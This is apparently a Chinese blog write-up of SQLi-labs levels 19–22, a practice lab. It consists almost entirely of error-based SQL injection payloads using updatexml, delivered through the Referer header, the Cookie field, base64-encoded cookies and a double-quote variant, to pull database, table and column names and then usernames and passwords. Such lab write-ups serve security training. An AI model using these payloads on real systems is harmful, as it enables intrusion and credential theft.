SQLi-19~22关

 

 其实漏洞写得很明确了,Referer存在漏洞

Referer:1' and '1'='1--+

 

Referer:1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1  #数据库

 

 

 Referer:1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 3,1),0x7e),1) and '1'='1

 

 Referer:1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 4,1),0x7e),1) and '1'='1

 

 

Referer:1' and updatexml(1,concat(0x7e,(select concat_ws('~',username,password) from users limit 0,1),0x7e),1) and '1'='1

二十关 

一样的闭合点,cookie注入.

uname=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1  #数据库

Cookie: uname=admin' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1) and '1'='1  #数据表

Cookie: uname=admin' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1) and '1'='1  #数据字段

Cookie: uname=admin' and updatexml(1,concat(0x7e,(select concat_ws('~',username,password) from users limit 4,1),0x7e),1) and '1'='1

 二十一关

 

 

 

 base64转码操作...

admin' and '1'='1  #闭合成功

 

 uname=YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpLDEpIGFuZCAnMSc9JzE  #数据库

 

 uname=YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGxpbWl0IDMsMSksMHg3ZSksMSkgYW5kICcxJz0nMQ==  #数据表

 

 YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGNvbHVtbl9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIGxpbWl0IDQsMSksMHg3ZSksMSkgYW5kICcxJz0nMQ==  #字段

 

 Cookie: uname=YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGNvbmNhdF93cygnficsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMgbGltaXQgNCwxKSwweDdlKSwxKSBhbmQgJzEnPScx  #数据

 

 

二十二关

和二十一关的区别是点引号和双引号

 

 差点让我以为是二十一关

admin" and "1"="1

YWRtaW4iIGFuZCAiMSI9IjE=

 

 闭合成功

admin" and updatexml(1,concat(0x7e,(select database()),0x7e),1) and "1"="1  #库

admin" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) and "1"="1  #表

admin" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1) and "1"="1  #字段

admin" and updatexml(1,concat(0x7e,(select concat_ws('~',username,password) from users limit 0,1),0x7e),1) and "1"="1  #数据

posted @ 2020-04-22 09:51  llcnKill  阅读(291)  评论(0编辑  收藏  举报